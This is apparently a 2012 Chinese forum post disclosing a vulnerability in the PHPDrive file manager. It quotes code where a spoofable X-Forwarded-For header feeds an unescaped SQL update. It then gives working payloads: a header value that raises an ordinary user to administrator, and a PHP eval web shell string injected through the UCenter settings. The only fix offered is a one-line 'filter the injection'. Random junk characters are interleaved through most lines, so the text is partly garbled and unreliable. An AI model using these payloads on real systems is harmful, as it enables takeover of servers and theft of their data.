PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
9 m' _# u! G+ S( U4 G: e' `) u1 u& x( i
includes/user.lib.php' Y! q1 M+ W! @& p6 }4 }. G
行87, Q, H. L" Z9 d- r1 I n0 m/ s
function get_ip() {
$ q& V" a6 b) U3 o if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.0 C4 v K; y4 L# ~5 n& v( ^( j7 p$ s" `3 Z
在用户注册与登录 处module/disk/account.lead.php
) I# ^ w6 w) r2 i a" D8 Y$ g198行 # \+ D3 p6 N) J' \' B0 s( }
//更新本次登录IP和时间
/ _( h/ F p, ?( T $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生
% }# f3 H% ~. J% d& S c由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
4 \4 P" M% v. ?+ Z9 r/ v实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.3 Y3 }% X. V- O+ W \
后台getshell:1 V6 Q' P/ M9 q# i
在UCenter设置处,将UC数据库登录名填写为& R2 s- w; f- Z% Q* W8 G% v
$ w. t/ E; ?* E4 B7 a5 ]: p
root’);eval($_POST[DisKill]);?>/*
. {2 E: j& w9 ?1 s0 {可以得到一个shell,位置在 data/uc.data.php
k, Q# M8 N, T& A/ |2 j9 U5 H- @3 B1 u6 w
修复:过滤注入
# ~4 d0 X; s$ E1 d. \+ g6 q9 n8 C: ~( b, n; o+ E! P
|
发表于 2012-12-31 09:18:34
收藏
支持
反对